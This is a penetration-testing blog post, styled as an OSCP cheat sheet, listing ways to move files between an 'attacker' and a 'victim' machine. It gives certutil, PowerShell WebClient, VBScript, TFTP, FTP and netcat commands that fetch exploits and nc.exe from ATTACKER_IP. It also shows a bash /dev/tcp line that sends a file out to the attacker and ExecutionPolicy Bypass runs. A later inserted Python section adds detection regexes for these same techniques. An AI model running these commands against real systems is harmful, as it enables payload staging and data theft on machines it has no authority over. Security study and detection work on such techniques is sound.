File Transfer Cheat Sheet for Penetration Testers | OSCP


Hello, here is one of the most useful takeaways for penetration testers and for people who are aiming to become one. Today I am sharing the file transfer methodologies that I use on a daily basis to transfer files from the target machine to the attacker machine and from the attacker machine to the target machine.

THIS IS MERELY CREATED FOR EDUCATIONAL & ETHICAL PURPOSE ONLY, AUTHOR IS NOT RESPONSIBLE FOR ANY ILLEGAL ACTIVITIES DONE BY THE VISITORS



Here is the collection of file transfer methodologies that you can use to copy files, exploits and information easily. These work in most scenarios; if not, you need to use them in a creative way. Here I will be using my Kali Linux as the attacker machine to keep things easier to understand.



Download a File Using wget: This is the one I use 90% of the time; if wget is not available I will go for nc or curl.
Start a Python HTTP Server on Your Attacker Machine:

#Python HTTP server should be started in the same location as that of the files to be transferred

python -m SimpleHTTPServer 8001
#SimpleHTTPServer is the Python 2 module; on Python 3 use: python3 -m http.server 8001
On Victim:

wget http://ATTACKER_IP:8001/


Download a file using Just Bash Script

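# Minimal HTTP GET using bash's built-in /dev/tcp (no wget or curl needed).
# Usage: __curl http://HOST[:PORT]/path > outfile
function __curl() {
  # Split the URL on "/" into protocol, host[:port] and path
  read proto server path <<<$(echo ${1//// })
  DOC=/${path// //}
  HOST=${server//:*}
  PORT=${server//*:}
  # No port in the URL: default to 80
  [[ x"${HOST}" == x"${PORT}" ]] && PORT=80

  # Open a TCP connection on file descriptor 3 and send the request
  exec 3<>/dev/tcp/${HOST}/$PORT
  echo -en "GET ${DOC} HTTP/1.0\r\nHost: ${HOST}\r\n\r\n" >&3
  # Skip the response headers (up to the first empty line), then print the body
  (while read line; do
   [[ "$line" == $'\r' ]] && break
  done && cat) <&3
  exec 3>&-
}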

Download a File Using Curl:

Start a Python HTTP Server on Your Attacker Machine:

#Python HTTP server should be started in the same location as that of the files to be transferred

python -m SimpleHTTPServer 8001
On Victim:

curl http://ATTACKER_IP:8001/ --output file.exe

Download a File Using nc.exe: 

You can use any port that is open, as long as inbound and outbound traffic through that port is allowed.
Receive a File

nc -lvp 8001 > file.txt

nc HOST_IP 8001 < file.txt
Send A File

nc.exe -l -p 4444 < file.txt

nc.exe -w 1 127.0.0.1 4444 > file.txt


Download And Execute a file using Powershell:

Start a Python HTTP Server on Your Attacker Machine:

python -m SimpleHTTPServer 8001
On Target:

powershell Invoke-WebRequest -Uri http://ATTACKER_IP:8001/nc.exe -OutFile C:\Users\Administrator\downloads\nc.exe


Downloading a file using CertUtil:

certutil.exe -urlcache -split -f "http://ATTACKER_IP/exploit.bat" exploit.bat

Downloading a file without any tool on Target:

on Kali:

nc -nvlp 9001 > backup.7z
on Target:

cat file.7z > /dev/tcp/ATTACKER_IP/9001

Downloading a file using SCP:

scp username@TARGET_IP:file.7z .

Download a File using PowerShell:

on Kali:

python -m SimpleHTTPServer 8001

on Victim:

powershell -Command (new-object System.Net.WebClient).Downloadfile('http://ATTACKER_IP:8001/41015.exe', 'shell.exe')

File Transfer using VBScript: This acts like wget/curl. It can be used when there is no nc, ncat or certutil on a Windows box.
Target Machine (Windows):

echo strUrl = WScript.Arguments.Item(0) > wget.vbs
echo StrFile = WScript.Arguments.Item(1) >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs
echo Dim http, varByteArray, strData, strBuffer, lngCounter, fs, ts >> wget.vbs
echo Err.Clear >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") >> wget.vbs
echo http.Open "GET", strURL, False >> wget.vbs
echo http.Send >> wget.vbs
echo varByteArray = http.ResponseBody >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set fs = CreateObject("Scripting.FileSystemObject") >> wget.vbs
echo Set ts = fs.CreateTextFile(StrFile, True) >> wget.vbs
echo strData = "" >> wget.vbs
echo strBuffer = "" >> wget.vbs
echo For lngCounter = 0 to UBound(varByteArray) >> wget.vbs
echo ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1, 1))) >> wget.vbs
echo Next >> wget.vbs
echo ts.Close >> wget.vbs
To Download a file:
cscript wget.vbs http://ATTACKER_IP/nc.exe nc.exe

OR

powershell -ExecutionPolicy Bypass -File wget.ps1 http://ATTACKER_IP/nc.exe nc.exe

File Transfer using TFTP:

On Your Kali Machine:

mkdir /share

atftpd --daemon --port 69 /share

cp /usr/share/windows-binaries/nc.exe /share/     #Copy nc.exe to share folder

On Target Machine:

tftp -i ATTACKER_IP get nc.exe

Non-Interactive File Transfer using FTP:

On Kali:

apt-get update && apt-get install pure-ftpd

cp /usr/share/windows-binaries/nc.exe .


nano ftp      

#copy-paste the below script into "ftp" file

#Script:

#!/bin/bash
groupadd ftpgroup
useradd -g ftpgroup -d /dev/null -s /etc ftpuser
pure-pw useradd bhanu -u ftpuser -d /ftphome
pure-pw mkdb
cd /etc/pure-ftpd/auth/
ln -s ../conf/PureDB 60pdb
mkdir -p /ftphome
chown -R ftpuser:ftpgroup /ftphome/
/etc/init.d/pure-ftpd restart

chmod 755 ftp
./ftp                     #need to set up a password
On Target Machine (downloading nc.exe using ftp):

echo open 10.11.0.5 21> ftp.txt
echo USER bhanu>> ftp.txt
echo ftp>> ftp.txt
echo bin >> ftp.txt
echo GET nc.exe >> ftp.txt
echo bye >> ftp.txt
ftp -v -n -s:ftp.txt


Downloading Files on Target Machine (PowerShell Script):
echo $storageDir = $pwd > wget.ps1
echo $webclient = New-Object System.Net.WebClient >>wget.ps1
echo $url = "http://ATTACKER_IP/nc.exe" >>wget.ps1
echo $file = "nc.exe" >>wget.ps1
echo $webclient.DownloadFile($url,$file) >>wget.ps1

Execution:

powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1
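
The defender's view of the techniques above, as an added example that is not part of the original post: a small Python matcher that flags the command lines from this cheat sheet in process-creation telemetry. It assumes events are already reduced to (host, command line) pairs, for example from Sysmon Event ID 1 or Windows Security event 4688 with command-line auditing; the rule names and sample events are constructed for illustration.

```python
import re

# Constructed rules, one per transfer technique listed on this page.
# Matching is on the process command line only (case-insensitive).
RULES = [
    ("certutil-urlcache", r"\bcertutil(\.exe)?\b.*[-/]urlcache\b.*\bhttps?://"),
    ("ps-webclient-downloadfile", r"\bpowershell(\.exe)?\b.*\bnet\.webclient\b.*\.downloadfile\("),
    ("ps-invoke-webrequest", r"\bpowershell(\.exe)?\b.*\b(invoke-webrequest|iwr)\b.*-outfile\b"),
    ("ps-policy-bypass-file", r"\bpowershell(\.exe)?\b.*-executionpolicy\s+bypass\b.*-file\b"),
    ("tftp-get", r"\btftp(\.exe)?\s+-i\s+\S+\s+get\b"),
    ("ftp-scripted", r"\bftp(\.exe)?\b.*\s-s:\S+"),
    ("cscript-url-arg", r"\b[cw]script(\.exe)?\b.*\.vbs\b.*\bhttps?://"),
    # Bash redirections never reach execve(); this only fires on shell
    # history or on commands passed as an argument (bash -c '...').
    ("bash-dev-tcp", r"/dev/tcp/[^/\s]+/\d+"),
]
COMPILED = [(name, re.compile(rx, re.IGNORECASE)) for name, rx in RULES]

def classify(cmdline):
    """Return the names of every rule that matches one command line."""
    return [name for name, rx in COMPILED if rx.search(cmdline)]

def scan(events):
    """events: iterable of (host, cmdline); return only the flagged ones."""
    flagged = []
    for host, cmdline in events:
        hits = classify(cmdline)
        if hits:
            flagged.append((host, hits, cmdline))
    return flagged

# Constructed sample events; 192.0.2.10 is a documentation-range address.
SAMPLE_EVENTS = [
    ("WS01", 'certutil.exe -urlcache -split -f "http://192.0.2.10/exploit.bat" exploit.bat'),
    ("WS01", "certutil.exe -hashfile nc.exe SHA256"),
    ("WS02", "powershell -Command (new-object System.Net.WebClient).Downloadfile('http://192.0.2.10:8001/41015.exe', 'shell.exe')"),
    ("WS02", "powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1"),
    ("WS03", "tftp -i 192.0.2.10 get nc.exe"),
    ("WS03", "ftp -v -n -s:ftp.txt"),
    ("WS03", "cscript wget.vbs http://192.0.2.10/nc.exe nc.exe"),
    ("LNX1", "bash -c 'cat file.7z > /dev/tcp/192.0.2.10/9001'"),
    ("LNX1", "atftpd --daemon --port 69 /share"),
]

if __name__ == "__main__":
    for host, hits, cmdline in scan(SAMPLE_EVENTS):
        print(host, ",".join(hits), "|", cmdline)
```

The echo lines that build wget.vbs, wget.ps1 and ftp.txt are cmd.exe built-ins and create no process events, so file-creation telemetry for those script files complements the command-line rules.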

Let me know which method you use frequently, and if I missed something, please comment below so that I can add it to the list, which might be useful in some situations.




Bhanu Namikaze

Bhanu Namikaze is an Ethical Hacker, Security Analyst, Blogger, Web Developer and a Mechanical Engineer. He Enjoys writing articles, Blogging, Debugging Errors and Capture the Flags. Enjoy Learning; There is Nothing Like Absolute Defeat - Try and try until you Succeed.
